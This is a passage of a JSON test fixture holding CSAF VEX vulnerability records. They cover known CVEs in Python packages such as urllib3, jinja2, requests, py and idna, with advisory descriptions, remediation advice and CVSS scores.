List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"}, {"summary": "Cve 2023", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 5.9, "environmentalSeverity": "MEDIUM", "integrityImpact": "HIGH", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "HIGH", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 5.9, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.0.6"]}], "title": "CVE-2023-43804/pkg:pypi/urllib3@2.0.4"}]}, "test/csaf_2.json": {}}, "common_summary": {"document": {"aggregate_severity": {"text": "High"}, "category": "csaf_vex", "csaf_version": "2.0", "lang": "en", "notes": [{"category": "legal_disclaimer", "text": "Depscan reachable code only covers the project source code, not the code of dependencies. A dependency may execute vulnerable code when called even if it is not in the project's source code. Regard the Depscan-set flag of 'code_not_in_execute_path' with this in mind."}], "publisher": {"category": "vendor", "contact_details": "vendor@mcvendorson.com", "name": "Vendor McVendorson", "namespace": "https://appthreat.com"}, "title": "Your Title"}, "product_tree": {"full_product_names": [{"name": "tinydb", "product_id": "tinydb:4.8.0", "product_identification_helper": {"purl": "pkg:pypi/tinydb@4.8.0"}}]}, "vulnerabilities": [{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2022-42969"]}], "cve": "CVE-2022-42969", "cwe": {"id": "1333", "name": "Inefficient Regular Expression Complexity"}, "discovery_date": "2022-10-16T12:00:23", "ids": [{"system_name": "CVE Record", "text": "CVE-2022-42969"}, {"system_name": "Pypi Advisory", "text": "py"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# ReDoS in py library when used with subversion  The py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled.  The particular codepath in question is the regular expression at `py._path.svnurl.InfoSvnCommand.lspattern` and is only relevant when dealing with subversion (svn) projects. Notably the codepath is not used in the popular pytest project. The developers of the pytest package have released version `7.2.0` which removes their dependency on `py`. Users of `pytest` seeing alerts relating to this advisory may update to version `7.2.0` of `pytest` to resolve this issue. See https://github.com/pytest-dev/py/issues/287#issuecomment-1290407715 for additional context.  ## Related CVE(s) CVE-2022-42969, PYSEC-2022-42969"}, {"category": "description", "details": "Vulnerability Description", "text": "ReDoS in py library when used with subversion "}], "product_status": {"known_affected": ["py@vers:pypi/>=0.0.0|<=1.11.0"]}, "references": [{"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"}, {"summary": "Cve 2022", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"}, {"summary": "Pypi Advisory py", "url": "https://pypi.org/project/py"}, {"summary": "Pypi Advisory py", "url": "https://pypi.org/project/py"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "environmentalScore": 7.5, "environmentalSeverity": "HIGH", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 7.5, "temporalSeverity": "HIGH", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["py@vers:pypi/>=0.0.0|<=1.11.0"]}], "title": "CVE-2022-42969/pkg:pypi/py@1.11.0"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2023-45803"]}], "cve": "CVE-2023-45803", "cwe": {"id": "200", "name": "Exposure of Sensitive Information to an Unauthorized Actor"}, "discovery_date": "2023-10-17T20:15:25", "ids": [{"system_name": "CVE Record", "text": "CVE-2023-45803"}, {"system_name": "GitHub Advisory", "text": "GHSA-g4mx-q9vg-27p4"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2023-212"}, {"system_name": "Rfc-editor Advisory", "text": "rfc9110"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# urllib3's request body not stripped after redirect from 303 status changes request method to GET urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 303 \"See Other\" after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although the behavior of removing the request body is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers.  From [RFC 9110 Section 9.3.1](https://www.rfc-editor.org/rfc/rfc9110.html#name-get):  > A client SHOULD NOT generate content in a GET request unless it is made directly to an origin server that has previously indicated, in or out of band, that such a request has a purpose and will be adequately supported.  ## Affected usages  Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable.  Both of the following conditions must be true to be affected by this vulnerability:  * If you're using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) * The origin service is compromised and starts redirecting using 303 to a malicious peer or the redirected-to service becomes compromised.  ## Remediation  You can remediate this vulnerability with any of the following steps:  * Upgrade to a patched version of urllib3 (v1.26.18 or v2.0.7) * Disable redirects for services that you aren't expecting to respond with redirects with `redirects=False`. * Disable automatic redirects with `redirects=False` and handle 303 redirects manually by stripping the HTTP request body.   ## Related CVE(s) CVE-2023-45803, PYSEC-2023-212"}, {"category": "description", "details": "Vulnerability Description", "text": "urllib3's request body not stripped after redirect from 303 status changes request method to GET"}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.0.7"], "known_not_affected": ["urllib3@2.0.7"]}, "references": [{"summary": "GitHub Advisory PYSEC-2023-212", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"}, {"summary": "GitHub Advisory PYSEC-2023-212", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"}, {"summary": "GitHub Advisory GHSA-g4mx-q9vg-27p4", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"}, {"summary": "GitHub Advisory GHSA-g4mx-q9vg-27p4", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"}, {"summary": "Cve 2023", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"}, {"summary": "Rfc-editor Advisory rfc9110", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"}, {"summary": "Rfc-editor Advisory rfc9110", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 4.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 4.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "ADJACENT_NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 4.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.0.7"]}], "title": "CVE-2023-45803/pkg:pypi/urllib3@2.0.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-22195"]}], "cve": "CVE-2024-22195", "cwe": {"id": "79", "name": "Improper Neutralization of Input During Web Page Generation"}, "discovery_date": "2024-01-11T15:20:48", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-22195"}, {"system_name": "GitHub Advisory", "text": "GHSA-h5c8-rqwp-cp95"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter The `xmlattr` filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the `xmlattr` filter, and an application doing so should already be verifying what keys are provided regardless of this fix."}, {"category": "description", "details": "Vulnerability Description", "text": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"}], "product_status": {"known_affected": ["jinja2@vers:pypi/>=2.0|<=3.1.2"]}, "references": [{"summary": "GitHub Advisory GHSA-h5c8-rqwp-cp95", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"}, {"summary": "GitHub Advisory GHSA-h5c8-rqwp-cp95", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "environmentalScore": 5.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "LOW", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "LOW", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "products": ["jinja2@vers:pypi/>=2.0|<=3.1.2"]}], "title": "CVE-2024-22195/pkg:pypi/jinja2@3.1.2"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-34064"]}], "cve": "CVE-2024-34064", "cwe": {"id": "79", "name": "Improper Neutralization of Input During Web Page Generation"}, "discovery_date": "2024-05-06T14:20:59", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-34064"}, {"system_name": "GitHub Advisory", "text": "GHSA-h75v-3vvj-5mfj"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `>`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for the previous GHSA-h5c8-rqwp-cp95 CVE-2024-22195 only addressed spaces but not other characters.  Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe."}, {"category": "description", "details": "Vulnerability Description", "text": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"}], "product_status": {"known_affected": ["jinja2@vers:pypi/>=2.0|<=3.1.3"]}, "references": [{"summary": "GitHub Advisory GHSA-h75v-3vvj-5mfj", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"}, {"summary": "GitHub Advisory GHSA-h75v-3vvj-5mfj", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "environmentalScore": 5.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "LOW", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "LOW", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "products": ["jinja2@vers:pypi/>=2.0|<=3.1.3"]}], "title": "CVE-2024-34064/pkg:pypi/jinja2@3.1.2"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-35195"]}], "cve": "CVE-2024-35195", "cwe": {"id": "670", "name": "Always-Incorrect Control Flow Implementation"}, "discovery_date": "2024-05-20T20:15:00", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-35195"}, {"system_name": "GitHub Advisory", "text": "GHSA-9wx4-h78v-vm56"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Requests `Session` object does not verify requests after making first request with verify=False When making requests through a Requests `Session`, if the first request is made with `verify=False` to disable cert verification, all subsequent requests to the same origin will continue to ignore cert verification regardless of changes to the value of `verify`. This behavior will continue for the lifecycle of the connection in the connection pool.  ### Remediation Any of these options can be used to remediate the current issue, we highly recommend upgrading as the preferred mitigation.  * Upgrade to `requests>=2.32.0`. * For `requests<2.32.0`, avoid setting `verify=False` for the first request to a host while using a Requests Session. * For `requests<2.32.0`, call `close()` on `Session` objects to clear existing connections if `verify=False` is used.  ### Related Links * https://github.com/psf/requests/pull/6655"}, {"category": "description", "details": "Vulnerability Description", "text": "Requests `Session` object does not verify requests after making first request with verify=False"}], "product_status": {"known_affected": ["requests@vers:pypi/>=0.0.0|<2.32.0"], "known_not_affected": ["requests@2.32.0"]}, "references": [{"summary": "GitHub Advisory GHSA-9wx4-h78v-vm56", "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"}, {"summary": "GitHub Advisory GHSA-9wx4-h78v-vm56", "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 5.6, "environmentalSeverity": "MEDIUM", "integrityImpact": "HIGH", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "HIGH", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 5.6, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["requests@vers:pypi/>=0.0.0|<2.32.0"]}], "title": "CVE-2024-35195/pkg:pypi/requests@2.31.0"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-3651"]}], "cve": "CVE-2024-3651", "cwe": {"id": "400", "name": "Uncontrolled Resource Consumption"}, "discovery_date": "2024-04-11T21:32:40", "ids": [{"system_name": "Huntr Advisory", "text": "93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"system_name": "CVE Record", "text": "CVE-2024-3651"}, {"system_name": "GitHub Advisory", "text": "GHSA-jjg7-2v4v-x38h"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2024-60"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode ### Impact A specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service.  ### Patches The function has been refined to reject such strings without the associated resource consumption in version 3.7.  ### Workarounds Domain names cannot exceed 253 characters in length, if this length limit is enforced prior to passing the domain to the `idna.encode()` function it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application.  ### References * https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb  ## Related CVE(s) CVE-2024-3651, PYSEC-2024-60"}, {"category": "description", "details": "Vulnerability Description", "text": "Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode"}], "product_status": {"known_affected": ["idna@vers:pypi/>=0.1|<=3.6"]}, "references": [{"summary": "GitHub Advisory GHSA-jjg7-2v4v-x38h", "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"}, {"summary": "GitHub Advisory GHSA-jjg7-2v4v-x38h", "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"}, {"summary": "GitHub Advisory PYSEC-2024-60", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml"}, {"summary": "GitHub Advisory PYSEC-2024-60", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml"}, {"summary": "Huntr Advisory 93d78d07-d791-4b39-a845-cbfabc44aadb", "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"summary": "Huntr Advisory 93d78d07-d791-4b39-a845-cbfabc44aadb", "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "environmentalScore": 6.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 6.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["idna@vers:pypi/>=0.1|<=3.6"]}], "title": "CVE-2024-3651/pkg:pypi/idna@3.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-37891"]}], "cve": "CVE-2024-37891", "cwe": {"id": "669", "name": "Incorrect Resource Transfer Between Spheres"}, "discovery_date": "2024-06-17T21:37:20", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-37891"}, {"system_name": "GitHub Advisory", "text": "GHSA-34jh-p97f-mpxf"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects  When using urllib3's proxy support with `ProxyManager`, the `Proxy-Authorization` header is only sent to the configured proxy, as expected.  However, when sending HTTP requests *without* using urllib3's proxy support, it's possible to accidentally configure the `Proxy-Authorization` header even though it won't have any effect as the request is not using a forwarding proxy or a tunneling proxy. In those cases, urllib3 doesn't treat the `Proxy-Authorization` HTTP header as one carrying authentication material and thus doesn't strip the header on cross-origin redirects.  Because this is a highly unlikely scenario, we believe the severity of this vulnerability is low for almost all users. Out of an abundance of caution urllib3 will automatically strip the `Proxy-Authorization` header during cross-origin redirects to avoid the small chance that users are doing this on accident.  Users should use urllib3's proxy support or disable automatic redirects to achieve safe processing of the `Proxy-Authorization` header, but we still decided to strip the header by default in order to further protect users who aren't using the correct approach.  ## Affected usages  We believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited:  * Setting the `Proxy-Authorization` header without using urllib3's built-in proxy support. * Not disabling HTTP redirects. * Either not using an HTTPS origin server or for the proxy or target origin to redirect to a malicious origin.  ## Remediation  * Using the `Proxy-Authorization` header with urllib3's `ProxyManager`. * Disabling HTTP redirects using `redirects=False` when sending requests. * Not using the `Proxy-Authorization` header."}, {"category": "description", "details": "Vulnerability Description", "text": "urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects "}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.2.2"], "known_not_affected": ["urllib3@2.2.2"]}, "references": [{"summary": "GitHub Advisory GHSA-34jh-p97f-mpxf", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf"}, {"summary": "GitHub Advisory GHSA-34jh-p97f-mpxf", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 4.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 4.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.2.2"]}], "title": 